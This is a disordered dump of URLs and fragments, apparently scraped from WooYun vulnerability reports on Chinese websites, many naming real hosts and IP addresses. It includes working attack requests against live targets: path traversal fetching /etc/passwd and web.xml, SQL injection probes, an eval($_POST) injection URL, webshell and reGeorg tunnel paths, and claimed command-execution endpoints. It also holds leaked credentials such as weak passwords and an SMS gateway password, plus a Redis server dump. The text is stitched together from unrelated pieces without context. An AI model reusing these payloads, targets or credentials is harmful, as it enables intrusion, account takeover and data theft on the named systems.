http://tian.web.yinyuetai.com/pictures?albumId=13301&uid=42087860 x.xx/xxxx inurl:do_download.jsp还有类似于download.jsp这样的 http://**.**.**.**/do_download.jsp?path=C:\Windows\System32\drivers\etc\hosts&isLogin=1 http://**.**.**.**/zjk/download/do_download.jsp?filename=../web-inf/web.xml http://**.**.**.**/Common/Js/WebEdit/do_download.jsp?UpLoadPath=WebGlzx/DB/&FileName=../../web-inf/web.xml http://**.**.**.**/setting/tabledown/do_download.jsp?url=/setting/table/../../web-inf/web.xml http://**.**.**.**/www/do_download.jsp?filename=../do_download.jsp http://**.**.**.**/synuedm/edm/website/secondpage/thirdpage/do_download.jsp?url=website/appendiximages/../../web-inf/web.xml http://**.**.**.**/download/download.jsp?filepath=download/download.jsp http://**.**.**.**/download/download.jsp?filepath=download/download.jsp http://**.**.**.**/download/download.jsp?filepath=download/../index.jsp www.ruiou.com http://www.chushou.tv/ http://www.chushou.tv/register.htm http://www.chushou.tv/password/reset.htm http://**.**.**.**/about_media_d.php?media_id=11 http://**.**.**.**/about_media_d.php?media_id=11 http://**.**.**.**:80/web/list.asp?id=%5c&name=%BA%EC%CA%AE%D7%D6%CA%C2%D2%B5 http://**.**.**.**:80/web/zyzlist.asp?id=%5c&name=%D0%C2%CE%C5%D6%D0%D0%C4 http://**.**.**.**:80/web/zyzcontent.asp?articleid=2916&id=%5c&name=%D0%C2%CE%C5%D6%D0%D0%C4 http://**.**.**.**:80/web/vote_response.asp http://**.**.**.**/bugs/wooyun-2014-080132 http://**.**.**.**/bugs/wooyun-2010-0125452 http://**.**.**.**/ http://**.**.**.**/CTManager/admin.do?action=selectAdminBySeqid&seqid=1 http://**.**.**.**/CTManager/admin.do?action=selectAdminBySeqid&seqid=5761 http://**.**.**.**/CTManager/admin.do?action=selectAdminBySeqid&seqid=5763 http://**.**.**.**/CTManager/login.do?lel=changeshop&author=WT3338&email=13325559162@**.**.**.** http://**.**.**.**/CTManager/admin.do?action=selectAdmin http://www.daasbank.com/download.action存在命令执行漏洞 http://**.**.**.**/dzqk/ http://**.**.**.**/tjs2010admin/system/Edit.aspx?ID=485 http://**.**.**.**/tjs2010admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http%3A%2F%2F**.**.**.**%2Ftjs2010admin%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx http://**.**.**.**/tjs2010admin/member/ptyh.aspx?mid=18219 http://**.**.**.**/web/more_details2.aspx?ID=279 http://**.**.**.**/sysmanage/registryParse.jsp?parentid=0 http://**.**.**.**/sysmanage/registryParse.jsp?parentid=0 http://**.**.**.**/sysmanage/registryParse.jsp?parentid=0 http://**.**.**.**/jsarticle.php?leng=38&r http://**.**.**.**/ http://bizhi.sogou.com/bbs/ http://**.**.**.**:80/ViewInfo.asp?ID=944 http://**.**.**.**/down/web/editor/admin_login.asp http://**.**.**.**/lqcx.asp http://**.**.**.**/ http://**.**.**.**/customer/grantech/news-detail.asp?id=3565 http://**.**.**.**/customer/grantech/news-detail.asp?id=3565 http://**.**.**.** http://**.**.**.**/platform/public/doFindPassword.jsp http://k.ganji.com/quicklogin http://**.**.**.**/ http://wooyun.org/bugs/wooyun-2010-0140374 http://**.**.**.**/ http://**.**.**.**/Job/List.aspx?ModuleNo=0603 http://**.**.**.**/about/showNews.html?newsid=121 http://**.**.**.**/about/showNews.html?newsid=121 http://blog.topsec.com.cn/wp-login.php http://**.**.**.**/lib/caj.php?Name=5 http://**.**.**.**/lib/caj.php?Name=5 http://221.8.57.106/ http://221.8.57.106/cK/foot.jsp http://**.**.**.**/login/userlogin http://**.**.**.**//qwe.jsp http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**/ http://**.**.**.**/payment/bankonline/0/toresult http://**.**.**.**/payment/bankonline/0/create http://**.**.**.**/payWebDirect.do http://**.**.**.**/B2B/BTBServiceInterface.asmx http://**.**.**.** http://**.**.**.** http://**.**.**.** https://**.**.**.**/order.do http://**.**.**.**/json/android/payment/bestpaycashiernotify/0/notifyBestpayCashier http://vip.vatti.com.cn/index.php?a=designer&c=index&category=1111&m=designer&page=1 http://www.anshengcredit.com/branch.php?id=30 http://www.anshengcredit.com/admin/login.php https://passport.qcloud.com/index.php http://**.**.**.**/user!login.action存在命令执行漏洞 http://**.**.**.**/22.jsp密码tom http://zh.chaoxing.com/zh.chaoxing.com.rar http://dealer.tuanche.com/ http://**.**.**.**/trade/detail.php?cr=D&cID=5 http://**.**.**.**/trade/detail.php?cr=D&cID=5 www.sfbest.com http://www.sfbest.com http://app.wandahotels.com/hotelprocess/hotel/hotelList.action http://**.**.**.**/news_shows.asp?id=100 http://**.**.**.**/news_shows.asp?id=100 http://**.**.**.**/gb/news_show.php?id=216&tid= http://**.**.**.**/gb/news_show.php?id=216&tid= https://**.**.**.**/mirrores/history/blob/e7beecc6f6bd94cf57356d63cafa7dcf614d9bba/application/config/email.php http://www.yunpian.com/alipay/create, https://**.**.**.**/aep/signInForget.html https://**.**.**.**/wangxuact/php-ihome/blob/c38b1160d0022d1306e566f78125ecc4408e9d35/ihome/data/data_mail.php http://**.**.**.**:8081/ https://www.91tianmi.com/forgot https://**.**.**.** http://companygit.chinacloudapp.cn/raw/~liusx/AppStore.git/master/ www.xinli001.com android:allowBackup="true"表示应用允许用户通过系统备份工具备份应用数据然后恢复,荷包应用涉及用户隐私与财产安全不应该选择开启此功能,因为这样用户在未 com.hebao.app/shared_prefs/shared_other.xml文件中,我通过 http://cps.jumei.com/ http://**.**.**.**/about/contact http://ejj.jjshipping.cn/eservices/shipsearch.jsp?startcon=CN&startPort=CNDLC&beginDate=2015-07-01&endDate=2015-07-31&endcon=CN&endPort=CNDLC http://218.108.234.212/DtvWebService/DtvWebService.asmx http://**.**.**.**/LoginAction.do http://**.**.**.**/LoginAction.do;jsessionid=E2118D0F3FA8BC4C1BDF34DC5075DE7A http://**.**.**.** http://**.**.**.**/rvwss/login.jsp http://**.**.**.**/debms/login.jsp http://**.**.**.**/debms/plan.do POST:org.apache.struts.taglib.html.TOKEN=2749fcadcd90ee1ea0e9cfa12eb44947&command=commonQuery&ksrq=&kskm=1&kscc=1&ksdd=5301102&pageSize=20 https://fxb.csair.com/fomsftc/ http://**.**.**.**:8080/cntmiServer/login.action:8080/cntmiServer/login.action http://111.203.2.34/ http://fellow.51cto.com http://gaozhao.51cto.com/deliver-get/resume-view?deliverId=319 http://gaozhao.51cto.com/deliver-get/resume-view?deliverId=319 http://gaozhao.51cto.com/deliver-get/resume-view?deliverId=319 http://gaozhao.51cto.com/deliver-get/resume-list http://yjspj.ecnu.edu.cn/login.jsp index.php/index/main.html http://mis.hongfa.com/login.aspx http://mis.hongfa.com/login.aspx http://mis.hongfa.com/login.aspx http://58.56.128.32:7001/neusoftam/login.jsp?j_redirect=%2Flms%2F http://58.56.128.32:7001/console/ http://58.56.128.32:7001/is/index.jsp http://103.255.93.100/ http://**.**.**.**/bugs/wooyun-2015-0150687 http://**.**.**.**/online/onabout!showList.action https://github.com/lilololi/exchange_address_download http://192.168.1.128/Pts/ViewProblem.aspx?problem=20108 http://118.191.6.52:8000/ http://58.83.196.168:8080/ebidding/login http://58.83.196.168:8080/upload5warn/cmd.jsp http://del.chinaz.com http://www.sanfu.com/ajax.php?action=select_sz_func&goods_id= http://doctor.51cto.com/service/read.sv.php?cid=298&t=1446447910 http://wap.fruitday.com:8888/ http://www.sto.cn/query_list.asp?name=%B8%A3%BD%A8%C8%AA%D6%DD%BA%BD%BF%D5%B2%BF http://www.cmseasy.cn/post/list.php?list=@eval%28$_POST[%27a%27]%29 http://www.aoratec.com http://www.aoratec.com/queryByIDProduct.action?pdId=53 http://amigo.gionee.com/ami_stat/ami_stat.php?type=mobile&val1=1&val2=list http://www.weichuanbo.com/ system:service=MainDeployer http://你的warshell地址 http://www.banban.so/data/attachment/v/bbtuploaducanneverimagine/2015091501.mp4 http://www.banban.so/data/attachment/vpreview/vyulanbbt/059.mp4 www.banban.so/player/CuSunV2set.php?FlvID=444 http://www.banban.so/player/CuSunV2set.php?FlvID= http://www.17sucai.com/pins/10990.html http://www.17sucai.com/preview/177696/2015-06-21/%E8%92%B2%E5%85%AC%E8%8B%B11/index.html http://www.17sucai.com/pins/10990.html http://timely.hiiir.com http://halo.argylehotels.com/forp/Home/Login?ReturnUrl=%2fforp%2f http://www.jinri.net/UserAccount/ProviderRegister.aspx http://mis.hongfa.com/login.aspx http://mis.hongfa.com/upload/SingleFileUpload.aspx http://mis.hongfa.com/uploadedFiles/x.aspx ftp://202.108.145.246 http://mis.hongfa.com/login.aspx http://mis.hongfa.com/admin/adminInfo.aspx http://222.73.46.131//futures/news/postcontent.aspx?id=75%20And%201=%28select%20db_name%28%29%29 http://**.**.**.**/news.php?id=78 http://**.**.**.**/news.php?id=78 http://**.**.**.**/ http://oa.daojia.58.com//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=xxxuser&P_2_String=xxxpwd http://oa.daojia.58.com//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=guoyi&P_2_String=123456 www.creditchina.hk/c/media_activities_details.php?id=111657 http://www.creditchina.hk/c/media_activities_details.php?id=111657 http://www.creditchina.hk/c/media_activities_details.php?id=111657 http://219.143.202.7/ http://219.143.202.7//cim/Login.aspx?Account= http://**.**.**.**/login/userlogin http://**.**.**.**//login/userlogin http://**.**.**.**//login/userlogin http://**.**.**.**///login/userlogin http://**.**.**.**/login/userlogin http://**.**.**.**/login/userlogin http://**.**.**.**/news.php?id=14%20and%201=2 http://**.**.**.**/news.php?id=14%20and%201=1 http://jfcc.faw.com.cn/ http://www.webspherechina.net/plus/itdaren/detail.php?vid=5 www.hbapp.net可直接FTP连接导致全部分站可webshell http://www.jinmajia.com/ http://web.jinmajia.com/test/index.jsp http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/点击下图中的标志链接,即网上预约服务 http://**.**.**.**:10000/taxservice/order/orderTo.action存在命令执行漏洞 http://**.**.**.**/images/dwzdsc.pdf http://**.**.**.**/ http://interface.api.haodai.com/capi/Intentuser/get_order_one http://tools.transn.com/tools/?act=plist&menu_id=4&v= http://www.lyt.cn/online/online!showProduct.action jdbc:mysql://localhost:3306/qyc_lvyoutong?useUnicode=true&characterEncoding=UTF-8 http://**.**.**.**/) http://**.**.**.**/bugs/wooyun-2015-0150977不是同一个文件/同一个操作的漏洞,而且需要的几个重要参数不一样,包括jsonstr={%22mapx%22:null,%22mapy%22:null,%22name%22:%22%22,%22path%22:%22%22,%22desc%22:%22%22,%22pId%22:null}和layerName,下面会具体说,测试时,为了这两个参数,测试了几天时间,今天终于突破了~~~ http://**.**.**.**/coremail/index.jsp?cus=1 http://**.**.**.**/tongzhi/info.htm)暴露大量负责人电话与姓名 http://**.**.**.**/news_details.php?news_id=121 http://**.**.**.**/news_details.php?news_id=121 http://**.**.**.**/news_details.php?news_id=121 http://**.**.**.**///admin/login.asp http://www.shejiben.com http://timely.hiiir.com http://**.**.**.**/index.php?c=news&a=detail&pid=2&id=94 http://**.**.**.**/index.php?c=news&a=detail&pid=2&id=94 http://mis.hongfa.com/ http://mis.hongfa.com/admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/C http://**.**.**.**/event_result.php?event_pkey=142 http://**.**.**.**/event_result.php?event_pkey=142 http://www.scient.com.cn/news/news.php?id=303 http://**.**.**.**/booksearchList.aspx?category=198&categorycode=A08 http://**.**.**.**/booksearchList.aspx?category=198&categorycode=A08 http://mis.hongfa.com http://mis.hongfa.com/1.aspx http://mis.hongfa.com/cs/select_ren.aspx?domains=&bmid=6 http://mis.hongfa.com/cs/select_ren.aspx?domains=&bmid=6 http://www.fawcar.com.cn/module/pageNews_hdzt.jsp?pageFile=pageNews_hdzt&Type=1&sonID=&Main=ztbdx&page=1&link_css=link_data http://www.fawcar.com.cn/module/pageNews_hdzt.jsp?pageFile=pageNews_hdzt&Type=1%20and%201=1&sonID=&Main=ztbdx&page=1&link_css=link_data http://www.fawcar.com.cn/module/pageNews_hdzt.jsp?pageFile=pageNews_hdzt&Type=1%20and%201=2&sonID=&Main=ztbdx&page=1&link_css=link_data http://**.**.**.**/defaultMain.aspx http://**.**.**.**/Feedback.aspx www.yidejia.com http://www.cmstop.com/ http://www.cmstop.cn/ http://site.cmstop.cn/system/attachment/thumblist?tags=&offset=0&size=35&width=250&height=100 http://119.84.78.97:8080/video http://mall.yto.net.cn/mall/searchGoods.action www.darryring.com)注册了一个账号; http://m.wzdai.com/index.php/Home/User/login password:123456 http://games.pwel.com.cn/EventsDota2/AjaxSelectSchool?school_id=1 http://www.bjsto.cn/member/index.aspx?type=login&language=cn https://www.wzdai.com/invest/ajaxLogin.html?callback=AAA http://uk7.18klk.com http://admin.chinafilmhy.com/ http://games.pwel.com.cn http://112.64.239.234/C6/ http://112.64.239.234/C6/WebResource.axd?d=1-7Gitksh2cmMXDQzYwf5Q2 http://news.ittime.com.cn/ http://tools.transn.com http://**.**.**.**/login!login.action存在命令执行漏洞 http://qywx.homeinns.com/rujia/a http://www.caissa.com.cn/ corp.xiaopi.com/api.php此请求中pagesize参数未做合法性校验,导致拼接sql语句的时候,混入了特殊字符,出现截断sql语句、注入恶意代码的可能。 http://**.**.**.** https://m.sino-life.com/SL_EFS/mweb/member/setting/set_mobile.html?version=1.0 http://ucoa.uc56.com:8088/Login.aspx http://ucoa.uc56.com:8088/OaWeb/PresonnelMain.aspx?typeid=26 http://cq.gionee.com/ http://shop1.vivo.com.cn,但是数据库用户权限很大,可夸12个库,有zabbix,cacti,还有shop的等等 http://shop1.vivo.com.cn/gallery-ajax_get_goods.html http://sqlmap.org http://**.**.**.**/ http://**.**.**.**/quanpingchuban_anlidaquan.html Data:userId=-1&realName=111111&userMail=1111111111@**.**.**.**&userTel=13909090099&userAge=age_b&checkMail=1&userStatus=1 http://**.**.**/_ http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.** http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**/_ http://**.**.**.**/index.do http://**.**.**.**/kwxmgl/login.jsp http://**.**.**.**/kwxmgl/jsp/nosession/zhmm/xzqhmmfs.jsp http://122.228.120.154/doc/page/login.asp http://tdcm-motor.com/doc/page/login.asp http://89.97.149.186/doc/page/login.asp http://122.228.120.154/doc/page/login.asp为一台海康威视DS-2CD3312D-I型监控摄像头的登录web地址。 urn:selfextension:psiaext-ver10-xsd urn:selfextension:psiaext-ver10-xsd http://uc.letvcloud.com/messageView/msgCenterDetailView.do?msgId=4199&msgStatus=0 http://wbgh.youxinpai.com/login/ http://wooyun.org/bugs/wooyun-2010-0149556 http://wbgh.youxinpai.com/login/check/ http://www.o2bra.com/addresses/1111/edit http://www.o2bra.com/somatotypes/1212/edit http://wap.zhaoxiaoshuo.com/paihang.php?y=2008 http://wap.zhaoxiaoshuo.com/paihang.php?y=2008 http://articles.csdn.net/1.html http://list.jr.jd.com/fundlist/1-11-112.htm http://**.**.**.**/main-uc.jsp http://**.**.**.**/main.action http://pub.adkmob.com/index.php?m=admin&c=index&a=login&pc_hash= http://**.**.**.**/seeyon/index.jsp http://**.**.**.**/seeyon//logs/ctp.log http://**.**.**.**/seeyon//logs/uc.log http://zsjy.sicnu.edu.cn/news_show.aspx?id=181 http://**.**.**.**/controller/showHtml.php?id=65 http://**.**.**.**/controller/file/others/fcfaedc7b9ca474c7ecf29e91114d306.php http://**.**.**.**/revamp/tour.php?CategoryID=3&Name=%E9%A3%9B%E6%A9%9F%E9%95%B7%E7%B7%9A http://**.**.**.**/revamp/tour.php?CategoryID=3&Name=%E9%A3%9B%E6%A9%9F%E9%95%B7%E7%B7%9A http://www.o2bra.com/ http://www.o2bra.com/admin/users http://bbs.yinhu.com/data/backup.zip http://**.**.**.**/zh/shownews.php?id=2346 admin:admin http://**.**.**.**/、http://**.**.**.**:7001/defaultroot/login.jsp,两处都可以撞库,用常用用户名和弱口令123456可获得30来个账号,可泄露大量内部信息。 http://www.gdmec.net/phx/newsInfo.action?oid=1000333455&typeId=13&typeName=%E7%BD%91%E7%AB%99%E5%85%AC%E5%91%8A http://www.gdmec.net/phx/newsList.action?typeId=14&typeName=%E4%BA%A7%E5%93%81%E9%A2%91%E9%81%93 http://www.gdmec.net/phx/newsDir.action?pid=2&ptypeName=%E7%89%A9%E8%B5%84%E9%9B%86%E5%9B%A2&typeName= http://www.gdmec.net/phx/newsInfo.action?oid=362416&pid=&typeId=14&ptypeName=&typeName=%E4%BA%A7%E5%93%81%E9%A2%91%E9%81%93¤tPage=1 http://www.gdmec.net/phx/newsList.action?pid=&typeId=13&ptypeName=&typeName=%E7%BD%91%E7%AB%99%E5%85%AC%E5%91%8A¤tPage= http://**.**.**.**/bugs/wooyun-2010-0131862 http://**.**.**.**/html/bszn/subtypelist.jsp?subid=12&typeid=4 http://**.**.**.**/ http://www.aoratec.com http://www.aoratec.com/queryByIDProduct.action?pdId=53 http://www.aoratec.com/queryByIDDynamic.action?dnId=77 http://www.aoratec.com/queryByIDDynamic.action?dnId=77 http://**.**.**.**/Manage_ka/Manage_ka_Index.asp http://software.xmu.edu.cn/View/Search.aspx?searchword=* http://ewpay.sysu.edu.cn/ewpay/business/charge.do?action=getCustomerByRoomList http://ewpay.sysu.edu.cn/ewpay/business/charge.do?action=getCustomerAccountJournal http://ewpay.sysu.edu.cn/ewpay/business/charge.do?action=waitPayOrderList IP:42.159.192.145 redis_version:2.8.4 redis_git_sha1:00000000 redis_build_id:a44a05d76f06a5d9 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.8.2 process_id:1702 run_id:c75429374d58616ca6ffdf64e3db6b67d8217381 tcp_port:6379 uptime_in_seconds:3906678 lru_clock:2049429 config_file:/etc/redis/redis.conf used_memory:9020896 used_memory_human:8.60M used_memory_rss:19374080 used_memory_peak:9897136 used_memory_peak_human:9.44M used_memory_lua:33792 mem_fragmentation_ratio:2.15 mem_allocator:jemalloc-3.4.1 rdb_last_save_time:1446557612 total_connections_received:365626 total_commands_processed:746359 keyspace_hits:390548 keyspace_misses:167495 latest_fork_usec:1877 role:master repl_backlog_size:1048576 used_cpu_sys:1134.95 used_cpu_user:1070.59 used_cpu_sys_children:152.21 used_cpu_user_children:560.07 db0:keys=10269,expires=32,avg_ttl=442061302 http://**.**.**.**/about.asp?id=10 http://www.enkj.com/encloudold/member/login.aspx http://oa.meteni.com/messager/users.data http://oa.uc56.com/UCOA/WF/WorkOpt/OneWork/CH.aspx?FK_Node=%27&WorkID=51858&FK_Flow=129 http://oa.meteni.com http://oa.meteni.com/page/maint/common/UserResourceUpload.jsp?dir=/ height:20px;BORDER http://**.**.**.**/news_show.asp?id=9307 http://www.jipinweixin.com/ http://www.wx21.cn/ http://www.alipaylife.com/ http://zy.weihubao.com http://www.chinajkzs.cn/ site:weihubao.com http://global.gionee.com/ http://global.gionee.com http://upesn.com。在web版里只找到几个xss,于是下载了app看看。 http://cq.gionee.com http://cq.gionee.com/BuildLog.aspx?id=linansong_20151103135345 http://cq.gionee.com/BuildLog.aspx?id=chenrui_20151103113815 http://cq.gionee.com/BuildLog.aspx?id=zhangjb_20151103141044 http://dealer.chexun.com/API/GetDealersByBrandIdOrCompanyId.ashx?ProvinceID=3 http://business.agehui.cn/find/seed/index?type_id=1* http://business.agehui.cn/find/seed/index?type_id=1* http://business.agehui.cn/find/seed/index?type_id=1* http://221.179.180.158:9007/QxtSms/QxtFirewall?OperID=shfz&OperPass=shfz33&SendTime=&ValidTime=&AppendID=&DesMobile=你的手机号&Content=wooyun&ContentType=15成功收到短信息,可群发单发 http://www.originseed.com.cn/webadmin/ http://www.originseed.com.cn/template/product/miniUpload.php http://business.agehui.com/admin/login http://ht.xmyunyou.com/ https://dl.packetstormsecurity.net/papers/general/LFI_With_PHPInfo_Assitance.pdf https://www.insomniasec.com/downloads/publications/phpinfolfi.py http://119.254.70.190/?_p=../../../../../../../../../../etc/passwd%00.jpg http://119.254.70.190/phpinfo.php http://**.**.**.**/ http://**.**.**.**:7001/defaultroot/login.jsp http://**.**.**.**/D:%5C/ http://**.**.**.**/D:%5C/bea/user_projects/domains/bjzl/boot.properties https://**.**.**.**/NetSPI/WebLogicPasswordDecryptor http://**.**.**.**:7001/console/ http://**.**.**.**:7001/qqq/index.jsp times:all passwordchg:yes passwordreq:yes active:yes http://**.**.**.**:7001/ezoa/reDuh.jsp http://app.a5.net//api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://www.4008107107.com/ http://www.4008107107.com/online/index?orderNumber=1101302878&s=hdlhgwfjd# http://m.wochacha.com/antifake/leibielist/rtype/1829*/page/2 http://iphone.wochacha.com/antifake/list/reid/1007*/query/%E6%98%AD%E8%B4%B5%E7%9A%84%E9%98%B2%E4%BC%AA%E9%AA%8C%E8%AF%81 http://218.30.113.117:8000/wordpress com:8000 http://inf-dev-maybach.weibo.com:8000/info.php http://interface.benlai.com/Web.config.bak http://img105.job1001.com/upload/adminnew/2015-09-28/1443433362-EDVWB8A.txt http://ubc.ecnu.edu.cn/front/ http://ubc.ecnu.edu.cn/front/artical.php?id=461 http://ubc.ecnu.edu.cn/front/artical.php?id=461 http://cemftp.ce-air.com/yyoa/seeyonDownLoadPic?filename=../../../../../../../../../../windows/win.ini&userFileType=1 http://cemftp.ce-air.com/yyoa/seeyonDownLoadPic?filename=../../../../../../../../../../windows/system.ini&userFileType=1 http://cargotest.ce-air.com/install/ http://video.appstar.com.cn/login.htm http://bbs.chexun.com/111.php(泄漏全站文件) http://bbs.chexun.com/1.txt(泄漏根目录文件) http://bbs.chexun.com/2.txt(PHP http://bbs.chexun.com/config/config_global.php.bk20140814 http://bbs.chexun.com/api/shop/1.php http://www.reachway.com.cn/ http://www.reachway.com.cn/reachway.rar http://**.**.**.**/double/searchlook.asp http://**.**.**.**/tcre/searchlook.asp http://**.**.**.**/xuanke/search_result.asp http://**.**.**.**//xuanke/search_shouce.asp http://**.**.**.**/neccs/login.asp http://www.zsb.ecnu.edu.cn/webapp/index.jsp http://www.zsb.ecnu.edu.cn/webapp/zcxx/zszc_info.jsp?id=15 http://www.zsb.ecnu.edu.cn/webapp/zcxx/zszc_info.jsp?id=15 http://www.scient.com.cn/ http://www.scient.com.cn/news/news.php?id=175 www.scient.com.cn/baby-center/mom-online.php?M http://www.scient.com.cn/news/news-search.php?new_keyword=%27%22%25 http://www.scient.com.cn/news/news.php?id=175 http://mobage.cn/ www.mobage.cn哦 http://wooyun.org/bugs/wooyun-2010-0122400 http://sim.qjxgold.com:28821/webTrader/loginAction!loginInit.action存在命令执行漏洞 http://**.**.**.**/about.asp?title=%D2%BD%D4%BA%BC%F2%BD%E9存在sql注入漏洞并且已经成功拿到用户名,密码 http://**.**.**.**/ http://**.**.**.**/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../ http://**.**.**.**/clf/system/clfindex.aspx http://insurance.my089.com/insurance/fileDownload?filename=../../../../../../../../etc/passwd www:x:500:500::/home/www:/bin/bash。然后突发奇想的查看下home/www/.bash_history ftp://58.240.60.178/%E9%9F%A9%E7%99%BB%E4%BC%9F/ http://**.**.**.** http://tw.faw.com.cn/ http://tw.faw.com.cn/manage/news_show.asp?id=6907 http://**.**.**.**/bugs/wooyun-2010-0107004 http://**.**.**.**/product/8.html http://**.**.**.**/product/4.html http://**.**.**.**/product/12.html http://**.**.**.**/user/b_OrderDetail.asp?dingdanhao=2015101012161%27 http://**.**.**.**/user/account/A_addAddress.asp?action=edit&id=5%27 http://**.**.**.**/user/account/A_addAddress.asp?action=edit&id=5%27 http://**.**.**.**/user/b_OrderDetail.asp?dingdanhao=2015101012161%27 http://**.**.**.**/ http://www.gtgw.wang/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://www.smartapp4u.com/androidService/cp/toEdit.h?cpId=0932 http://jfsearch.faw.com.cn http://jfsearch.faw.com.cn/showUnderpan.jsp http://www.soochowlife.net http://www.soochowlife.net/dwservices/tlzq/tljgcx/index.jsp http://www.soochowlife.net/dwservices/tlzq/tljgcx/index.jsp http://www.soochowlife.net/dwservices/tlzq/tljgcx/index.jsp http://client.wochacha.com/commodity/image?black=/*/&pkid=33947713 http://**.**.**.**/Admin/WebUpload.aspx这里没有权限限制,可以上传文件。 http://**.**.**.**/login.asp?id=56&ref=/030522/jchf.asp http://**.**.**.**/login.asp?id=56&ref=/030522/jchf.asp http://math.ecnu.edu.cn/~chlu/intro_c.html?language=1&id=116 math.ecnu.edu.cn/~chlu/intro_c.html?language=1&id=116 http://**.**.**.**/zxgk.asp?lanmu=1&id=1页面存在SQL注入漏洞 http://60.ecnu.edu.cn/news/manage/news/news_js.asp?categoryid=144&cols=1&rows=4&templateid=6 http://download.ikonke.com/phpmyadmin/ http://advisor.dell-brand.com/index.php?a=search&cid=1&m=solution&sid=6&wd=e http://www.sogou.com/sogou?pid=sogou-clse-ac73001b1d44f492-0003&query=%20BNJ?%3E%20%3C&cid=qq.sogou.search&w=%20BNJ?%3E%20%3C&ie=utf-8 http://www.weloop.cn/ http://**.**.**.**/lydtsub/article.jsp?articleId=8461241 http://**.**.**.**/student/my/login http://**.**.**.**/student/my/login http://www.xgb.uestc.edu.cn/ http://www.xgb.uestc.edu.cn/mainnewsPage.php?id=110312304 http://www.xgb.uestc.edu.cn/mainnewsPage.php?id=110312304 http://zhengzhou.vanke.com/file.php?file= http://gm.ns.youzu.com/ http://www.ixingmei.com/miaosha.php?id=24 http://www.soochowlife.net http://www.soochowlife.net/yxywy/findMember.jsp http://www.soochowlife.net/yxywy/findMember.jsp http://www.soochowlife.net/yxywy/findMember.jsp http://sales.soochowlife.net:9002/ http://sales.soochowlife.net:9002/user/dealUserInsert.jsp http://sales.soochowlife.net:9002/user/userInsert.jsp?self=selfInfo&operFlag=1 http://m.wochacha.com/express/search?barcode=94102&express=%E5%AE%85%E6%80%A5%E9%80%81&gcsid=24eeb5d3522a79d9efc11f6042f848c3 http://m.wochacha.com/express/search?barcode=94102&express=%E5%AE%85%E6%80%A5%E9%80%81&gcsid=24eeb5d3522a79d9efc11f6042f848c3 http://218.80.224.35:8080/settlementsys/settlement_flex-debug/settlement_flex.html http://218.80.224.35:8080/app/server.jsp http://**.**.**.**:8088/Login.aspx,此处登陆无限制,可用常用用户名和常用弱口令进行撞库,获得一个有效账号:用户名lihui、密码123321,登陆后可查看全公司通讯录、全国各中心客服及网点名单、联系方式等大量内部信息。 http://cater.haidilao.com/Cater/web/telephoneLogin/gotoTelLoginPage.action https://mail.euchost.com http://60.ecnu.edu.cn/zfmx_detail.asp?id=601 http://60.190.251.204:8080/foxinn/ http://60.190.251.204:8080/FoxhisFileServer/ http://60.190.251.204:8080/zecmd/zecmd.jsp http://www.qiku.com/myec/myAddress.htm http://www.qiku.com/address/update.htm http://www.dfzq.com.cn/dfzq.rar http://oa.weifu.com.cn/j_acegi_security_check http://oa.weifu.com.cn/j_acegi_security_check http://gq.faw.com.cn/ http://gq.faw.com.cn/module/pageNews_fwcz.jsp?pageFile=pageNews_fwcz&covered_area1=0&covered_area2=100000&price1=0&price2=10000000&Key=&page=1&link_css=style6 url:http://www.pybk.com/friend.php?do=location&resideprovince=1 http://**.**.**.**/bugs/wooyun-2010-0142088 http://ac.haidilao.com/WebServices/WebServiceSSOUser.asmx/Search?usercode=0001 http://www.wise.xmu.edu.cn/imwise/Login.aspx http://218.57.146.240/cgi-bin/SVNGuanJia/usercenter.cgi http://wooyun.org/bugs/wooyun-2015-0151511 www.ittime.com.cn http://www.o2bra.com/ password:123456 http://www.super8.com.cn C7A3E5E04C02676E065E9E3828AEDAFF:FG=1 www.super8.com.cn http://oa.cowealth.com:8080/ http://gyb.xmu.edu.cn/ http://gyb.xmu.edu.cn/Public/File/5639c452c3449.php http://**.**.**.**/zhonggang/wokaoqu.aspx?ss=170 http://**.**.**.**/zhonggang/TeBieZhuanLan4.aspx?id=227&idl=0 http://icipms.inspur.com/ipms/jsp/login/inspur_login.jsp http://oa.weidai.com.cn/seeyon/index.jsp http://**.**.**.**/InterActive/HYB_Message.aspx?Class2_ID=0508该页面存在SQL注入漏洞 https://60.10.8.161/Login.aspx https://oneapm.kf5.com https://oneapm.kf5.com/community/question/id/3162/ http://xsgw.faw.com.cn/faw_online/admin.jsp http://zitai.vanke.com/chengji.aspx?bid=3&name=Smith&city= http://**.**.**.**/aboutus.php?cid=2 http://42.159.5.146:8080 http://englishonline.ecnu.edu.cn http://oa.99114.com/ http://oa.99114.com//messager/users.data http://www.lushanly.com/travel_car_gonglve.php?a_id=5&b_id=25&c_id=226 http://conference.lib.ecnu.edu.cn/Users.aspx?name=e&unit=e http://**.**.**.**/bugs/wooyun-2015-0141553 http://**.**.**.** http://www.xb.cgdc.com.cn/ www.xb.cgdc.com.cn http://**.**.**.**/x5/UI/portal2/process/portal/login.w http://hs.xd.com/data/wujiang/?role=42 http://hs.xd.com/data/ziyuan/?role=370 http://mobile.taikang.com/payment/bindBankList?cidnumber=1&orderAmount=1 http://mobile.taikang.com/payment/bindBankList?cidnumber=1*'%20or%20'aa'='a&orderAmount=1&orderAmount=1 https://www.xmjr.com 